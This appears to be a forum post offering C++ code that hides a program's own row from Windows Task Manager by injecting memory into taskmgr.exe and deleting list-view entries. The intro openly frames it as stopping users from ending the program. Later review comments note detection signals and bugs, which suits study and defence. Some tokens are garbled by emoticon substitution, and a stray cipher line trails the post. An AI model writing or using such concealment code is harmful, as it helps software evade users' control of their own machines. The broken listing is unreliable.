Make a program hide itself from Task Manager
If you for whatever reason decided maybe a user shouldn't end your program (because they don't want you to stop their er.. music right) the following code will help out. This code will NOT make you immune to HJT and other log generators, just to users checking their Task Manager. Also: Will only work on English versions of Winblows; if you would like to change it for other versions check line 49. You could duplicate line 49 but substitute "Windows Task Manager" for translated versions, and for each translation you will need to create a new if statement like the one between 63 and 101 substituting "Processes" and "SysListView32" for their translated correspondents.
[code=cpp]#include <iostream>
using namespace std;
#include <windows.h>
#include <stdio.h>
#include <commctrl.h>
#include <string>

// Name of the logged-on user, filled in by GetUserName() in main(); dwSize is
// the in/out length argument that call updates.
const unsigned long BUFSIZE = 255;
unsigned long dwSize = BUFSIZE;
char pbuf[ BUFSIZE + 1];

// Full path of this executable. Note that the GetModuleFileNameA() call is a
// dynamic initialiser, so it runs before main() is entered; `size` is 0 when
// the call fails and main() checks that before using `filename`.
char filename[ MAX_PATH ];
DWORD size = GetModuleFileNameA( NULL, filename, MAX_PATH );

// lvi is the local LVITEM template; _lvi points at the copy that block()
// allocates inside the Task Manager process with VirtualAllocEx(), so that
// pointer is only meaningful in the remote address space, never locally.
LVITEM lvi, *_lvi;
// Local copies of one list-view row's column 0 and column 1 text ...
char item[512], subitem[512];

// ... and the remote buffers (again Task Manager's address space) that the
// list view writes the text into before it is read back.
char *_item, *_subitem;
// Process id of the window's owning process and the handle opened on it.
unsigned long pid;
HANDLE process;

// Base name of this executable (directory part stripped), set in main().
char exename[257];

// EnumChildWindows callback, defined below.
BOOL CALLBACK block(HWND,LPARAM);
// Entry point: records the current user name and this executable's base name
// in globals, then loops forever handing every child window of an English
// Task Manager to block().
//
// NOTE(review): the tokens `string:Confusedize_type` and `for(;Wink{` below
// look like forum emoticon substitutions in the posted text; the listing does
// not compile as shown.
int main(){


// Fills pbuf with the user name; dwSize is updated with the length written.
GetUserName(pbuf, &dwSize);
//cout << (LPCTSTR)pbuf << endl;



// `size` is the GetModuleFileNameA() result from static initialisation.
if (size){
string strfilename = (string)filename;
string:Confusedize_type position = strfilename.rfind('\\');
position++; //Only calculates to one BEFORE backslash
string finalexe = strfilename.substr(position, strfilename.size());

// Inclusive bound: copies the base name plus its terminating NUL into the
// fixed-size global; nothing checks the length against sizeof(exename).
for(int a=0;a<=finalexe.size();a++){
exename[a] = finalexe[a];
}
}



HWND fwindow;   // unused
// Polling loop: every ~1 ms look up the Task Manager top-level window by its
// English title and enumerate its children through block(). The FindWindow()
// result is not checked for NULL. From a monitoring standpoint, a tight
// FindWindow()/EnumChildWindows() loop like this is itself a behavioural
// indicator.
for(;Wink{
Sleep(1);
EnumChildWindows(FindWindow(0,"Windows Task Manager"),block,0);
}

return 0;
}

// EnumChildWindows callback. For the Task Manager child that is the
// "Processes" SysListView32, it reads every row's image-name and user-name
// columns through LVM_GETITEMTEXT and removes the rows that match this
// executable and the current user with LVM_DELETEITEM.
//
// What this does and does not do, for anyone analysing it: the row is
// removed from Task Manager's list *control* only; the process itself is
// untouched and remains visible to every other enumeration method. Because
// LVM_GETITEMTEXT takes a pointer that must be valid inside the window's own
// process, the code opens Task Manager with PROCESS_VM_* rights and allocates
// the LVITEM and text buffers there -- an OpenProcess() on taskmgr.exe with
// PROCESS_VM_WRITE from an unrelated process is the strong telemetry signal
// here. The presumption is that Task Manager's periodic refresh repopulates
// the row, which is why main() re-runs this every millisecond.
//
// hwnd   -- child window being enumerated.
// lParam -- unused (main() passes 0).
// Returns TRUE to continue enumeration, FALSE once the list view was handled.
BOOL CALLBACK block(HWND hwnd,LPARAM lParam)
{
char classname[150] = "";
char windowtext[150] = "";

GetWindowText(hwnd,windowtext,149);
// NOTE(review): nMaxCount of 249 here is larger than the 150-byte buffer.
GetClassName(hwnd,classname,249);

// Only the list view of the "Processes" tab is of interest.
if (strstr(windowtext,"Processes") && strstr(classname,"SysListView32") !=NULL)
{

int count=(int)SendMessage(hwnd, LVM_GETITEMCOUNT, 0, 0);
int i;
// Open the window's owning process (Task Manager) for remote memory access.
// The returned handle is not checked for NULL (e.g. when Task Manager runs
// at a higher integrity level the call fails and the allocations below fail
// silently too), and it is never closed with CloseHandle().
GetWindowThreadProcessId(hwnd, &pid);
process=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_READ|
PROCESS_VM_WRITE|PROCESS_QUERY_INFORMATION, FALSE, pid);

// Remote copies of the LVITEM and of the two text buffers; return values are
// not checked.
_lvi=(LVITEM*)VirtualAllocEx(process, NULL, sizeof(LVITEM),
MEM_COMMIT, PAGE_READWRITE);
_item=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);
_subitem=(char*)VirtualAllocEx(process, NULL, 512, MEM_COMMIT,
PAGE_READWRITE);

lvi.cchTextMax=512;
for(i=0; i<count; i++) {
// Column 0 (image name): point the remote LVITEM at the remote text buffer,
// push it over, and let the list view fill it in.
lvi.iSubItem=0;
lvi.pszText=_item;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);

// Column 1 (user name), same mechanism.
lvi.iSubItem=1;
lvi.pszText=_subitem;
WriteProcessMemory(process, _lvi, &lvi, sizeof(LVITEM), NULL);
SendMessage(hwnd, LVM_GETITEMTEXT, (WPARAM)i, (LPARAM)_lvi);


// Copy both strings back into the local buffers.
ReadProcessMemory(process, _item, item, 512, NULL);
ReadProcessMemory(process, _subitem, subitem, 512, NULL);

// A row whose image name contains this executable's base name and whose
// user column contains the current user name is removed from the list
// control. `item` is compared against the executable name and `subitem`
// against the process owner. Note that deleting row i shifts the rows that
// follow while the loop still walks up to the original `count`.
if (strstr(item,exename) && strstr(subitem,(LPCTSTR)pbuf) !=NULL) SendMessage(hwnd, LVM_DELETEITEM, (WPARAM)i, (LPARAM)_lvi);
}
// Release the remote allocations; the process handle itself stays open.
VirtualFreeEx(process, _lvi, 0, MEM_RELEASE);
VirtualFreeEx(process, _item, 0, MEM_RELEASE);
VirtualFreeEx(process, _subitem, 0, MEM_RELEASE);
return FALSE;   // stop enumerating: the list view has been handled
}

return TRUE;    // not the window we want; keep enumerating
}[/code]
;7$=v?%v%#5>v7v8994
The decrypt code is V, I could not make it any simpler!